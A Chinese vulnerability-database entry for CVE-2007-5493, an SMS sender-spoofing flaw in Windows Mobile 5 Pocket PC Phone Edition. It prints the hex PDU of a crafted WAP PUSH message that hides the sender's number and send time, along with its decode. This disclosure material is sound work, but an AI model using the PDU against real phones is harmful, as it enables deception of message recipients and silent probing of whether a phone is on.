漏洞信息详情
Microsoft Windows Mobile短信处理器来源迷惑漏洞
- CNNVD编号:CNNVD-200710-355
- 危害等级: 中危
- CVE编号: CVE-2007-5493
- 漏洞类型: 权限许可和访问控制
- 发布时间: 2007-10-17
- 威胁类型: 远程
- 更新时间: 2007-10-24
- 厂 商: microsoft
- 漏洞来源: Ollie Whitehouse ...
漏洞简介
Windows Mobile是微软开发的用于手机的操作系统。
Windows Mobile的短信处理器中存在安全漏洞,如果发送了特制的WAP PUSH消息的话,就可能在接收者的手机上隐藏原始短信的发送者。
原始PDU如[1]所示,以下PDU会导致Pocket PC电话版本的SMS处理器错误的解码PDU,这样发送者的手机号码和发送时间都是错误的。
[1] PDU(自动换行)
079144775810065051220C914477619269060004A7600605040B8423F025060803AE81EA
AF82B48401056A0045C6070D0373796D616E7465630085010353796D616E7465630D0D62
756C6B534D532028556E726567697374657265642056657229202D204C6F6769784D6F62
696C652E636F6D000101
PDU的解码请见[2]。当SmartPhone接收到这条消息的时候,就会未经交互便将其丢弃,这也允许攻击者未经短信接收者确认便可以判断对方手机是否打开。
[2] PDU解码
PDU LENGTH IS 118 BYTES
ADDRESS OF DELIVERING SMSC
NUMBER IS : +447785016005
TYPE OF NR. : International
NPI : ISDN/Telephone (E.164/163)
MESSAGE HEADER FLAGS
MESSAGE TYPE : SMS SUBMIT
REJECT DUPLICATES : NO
VALIDITY PERIOD : RELATIVE
REPLY PATH : NO
USER DATA HEADER : PRESENT
REQ. STATUS REPORT : NO
MSG REFERENCE NR. : 34 (0x22)
DESTINATION ADDRESS
NUMBER IS : +447716299660
TYPE OF NR. : International
NPI : ISDN/Telephone (E.164/163)
PROTOCOL IDENTIFIER (0x00)
MESSAGE ENTITIES : SME-to-SME
PROTOCOL USED : Implicit / SC-specific
DATA CODING SCHEME (0x04)
AUTO-DELETION : OFF
COMPRESSION : OFF
MESSAGE CLASS : NONE
ALPHABET USED : 8bit data
VALIDITY OF MESSAGE : 24.0 hrs
USER DATA PART OF SM
USER DATA LENGTH : 96 octets
UDH LENGTH : 6 octets
UDH : 05 04 0B 84 23 F0
UDH ELEMENTS : 05 - Appl. port addressing 16bit
4 (0x04) Bytes Information Element
09200 : SOURCE port is: allocated by IANA
02948 : DESTINATION port is: allocated by IANA
--- DATA ----------------------
05 04 0B 84 23 F0
USER DATA (TEXT) : \\%®ê¯‚´„jEÆ
symantec…Symantec
bulkSMS (Unregistered Ver) -
LogixMobile.com
漏洞公告
目前厂商还没有提供此漏洞的相关补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.microsoft.com/technet/security/
参考网址
来源: MISC
链接:http://www.symantec.com/content/en/us/enterprise/research/SYMSA-2007-011.txt
来源: BID
名称: 26091
链接:http://www.securityfocus.com/bid/26091
来源: BUGTRAQ
名称: 20071017 SYMSA-2007-011: Microsoft WM5 PocketPC Phone Ed SMS Handler Issue
链接:http://www.securityfocus.com/archive/1/archive/1/482446/100/0/threaded
来源: OSVDB
名称: 45517
链接:http://osvdb.org/45517
来源: XF
名称: win-mobile-sms-obfuscation(37249)
链接:http://xforce.iss.net/xforce/xfdb/37249
来源: SECTRACK
名称: 1018832
链接:http://securitytracker.com/id?1018832
受影响实体
- Microsoft Windows_mobile:2005
补丁
暂无
![weinxin](http://zone.ci/zone_ci_images/zone.ci.png)
评论